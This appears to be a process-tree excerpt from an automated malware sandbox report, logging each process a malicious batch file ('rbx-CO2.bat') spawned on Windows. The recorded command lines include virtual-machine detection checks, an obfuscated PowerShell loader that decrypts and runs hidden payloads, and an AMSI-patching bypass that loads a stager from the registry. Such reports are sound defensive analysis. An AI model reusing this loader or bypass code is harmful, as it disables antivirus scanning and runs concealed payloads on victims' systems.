                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:08:53:42
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:wmic diskdrive get Model
                                          Imagebase:0x7ff6d61e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:08:53:42
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\findstr.exe
                                          Wow64 process (32bit):false
                                          Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                          Imagebase:0x7ff7c0250000
                                          File size:36'352 bytes
                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:08:53:42
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:wmic diskdrive get Manufacturer,Model
                                          Imagebase:0x7ff6d61e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:08:53:42
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\findstr.exe
                                          Wow64 process (32bit):false
                                          Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                                          Imagebase:0x7ff7c0250000
                                          File size:36'352 bytes
                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:08:53:45
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                                          Imagebase:0x7ff630570000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:08:53:45
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell.exe -WindowStyle Hidden
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:08:53:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WerFault.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
                                          Imagebase:0x7ff6b7c80000
                                          File size:570'736 bytes
                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:08:54:07
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                          Imagebase:0x7ff630570000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:08:54:07
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:15
                                          Start time:08:54:07
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                          Imagebase:0x7ff630570000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:16
                                          Start time:08:54:07
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell.exe -WindowStyle Hidden
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:17
                                          Start time:08:54:08
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                          Imagebase:0x7ff630570000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:18
                                          Start time:08:54:08
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:19
                                          Start time:08:54:08
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:wmic diskdrive get Model
                                          Imagebase:0x7ff6d61e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:20
                                          Start time:08:54:08
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\findstr.exe
                                          Wow64 process (32bit):false
                                          Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                          Imagebase:0x7ff7c0250000
                                          File size:36'352 bytes
                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:21
                                          Start time:08:54:09
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:wmic diskdrive get Manufacturer,Model
                                          Imagebase:0x7ff6d61e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:22
                                          Start time:08:54:09
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\findstr.exe
                                          Wow64 process (32bit):false
                                          Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                                          Imagebase:0x7ff7c0250000
                                          File size:36'352 bytes
                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:24
                                          Start time:08:54:28
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                                          Imagebase:0x7ff630570000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:25
                                          Start time:08:54:28
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell.exe -WindowStyle Hidden
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:27
                                          Start time:08:54:34
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WerFault.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7088 -s 2212
                                          Imagebase:0x7ff6b7c80000
                                          File size:570'736 bytes
                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:29
                                          Start time:08:54:39
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WerFault.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7088 -s 2104
                                          Imagebase:0x7ff6b7c80000
                                          File size:570'736 bytes
                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:30
                                          Start time:08:54:40
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\schtasks.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                          Imagebase:0x7ff716430000
                                          File size:235'008 bytes
                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:31
                                          Start time:08:54:40
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:32
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                          Imagebase:0x6d0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:33
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:34
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                          Imagebase:0x6d0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:35
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                          Imagebase:0x6d0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:36
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$YOhLAkBIOfDYUh=$tBOzPEeXdclpo.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+'r'+''+'o'+''+[Char](99)+'A'+'d'+''+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DyGxdRsDFLitOyBSDtJ=thuUFdhjXkHq @([String])([IntPtr]);$xwWcsbJiItNzaRumjCNQuH=thuUFdhjXkHq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$poeTVxHWVZq=$tBOzPEeXdclpo.GetMethod(''+'G'+''+'e'+''+'t'+'M'+'o'+'d'+[Char](117)+'l'+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$HcKZyefBJpvKrT=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$poeTVxHWVZq,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$nXtMNPKuSorvJxsIp=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$poeTVxHWVZq,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$XeqQGMF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HcKZyefBJpvKrT,$DyGxdRsDFLitOyBSDtJ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$IPJIfzrUhQjJlmTUH=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$XeqQGMF,[Object](''+[Char](65)+'ms'+[Char](105)+''+'S'+''+'c'+'an'+[Char](66)+''+[Char](117)+'ffe'+[Char](114)+'')));$GrxNgCPqmZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nXtMNPKuSorvJxsIp,$xwWcsbJiItNzaRumjCNQuH).Invoke($IPJIfzrUhQjJlmTUH,[uint32]8,4,[ref]$GrxNgCPqmZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IPJIfzrUhQjJlmTUH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nXtMNPKuSorvJxsIp,$xwWcsbJiItNzaRumjCNQuH).Invoke($IPJIfzrUhQjJlmTUH,[uint32]8,0x20,[ref]$GrxNgCPqmZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+[Char](120)+''+[Char](45)+'s'+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:37
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:38
                                          Start time:08:54:45
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\dllhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
                                          Imagebase:0x7ff642ec0000
                                          File size:21'312 bytes
                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:39
                                          Start time:08:54:45
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\winlogon.exe
                                          Wow64 process (32bit):false
                                          Commandline:winlogon.exe
                                          Imagebase:0x7ff70f350000
                                          File size:906'240 bytes
                                          MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                          Has elevated privileges:true
